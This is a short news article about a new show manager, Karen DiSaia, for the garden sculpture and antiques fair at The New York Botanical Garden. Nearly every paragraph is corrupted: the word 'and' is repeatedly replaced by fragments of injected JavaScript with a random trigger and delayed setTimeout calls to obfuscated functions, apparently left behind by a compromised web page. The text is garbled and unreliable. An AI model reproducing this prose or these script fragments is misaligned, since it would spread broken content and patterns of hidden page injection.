NEW YORK CITY — Long known as the Antiques Garden Furniture Show andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Sale at The New York Botanical Garden, which made some big changes last year, including its name to the Garden Sculpture And Antiques Fair: 1750–2013, the show now has a new show manager — Karen DiSaia.
A seasoned show promoter, DiSaia was approached in late August to take over the show, which had been run recently by Catherine Sweeney Singer, who gave up management earlier this year when she was tapped to run the Philadelphia Antiques Show.
“I really am taking the opportunity to make a fresh start with the show andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and looking forward to bringing it back to being specifically a show of antiques for the garden andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and for the garden room,” DiSaia said, noting that like her Connecticut Spring Antiques Show, which is known as an Americana show, focused shows have their place andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and derive strength from sticking to their core focus.
“We’re going to be looking at everything with a fresh eye,” she said, adding that she was thrilled with the commitment andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and involvement from the garden staff so far andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the “tremendous” support from dealers.
Acknowledging a garden antiques show is a bit of a departure from her Americana-centric antiques shows, DiSaia said, “I’m excited to try something new…I think it will be very exciting.”
DiSaia has already contacted the show’s dealers andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and is actively seeking their input as to the show’s future. “I think all shows at some point need to take a good hard look at things andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and in some ways start fresh…so I think we’re looking at this as an opportunity to do that…with respect to all the dealers who have invested years.”
The show will open with a preview on Thursday, April 24, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the show will run April 25–27.
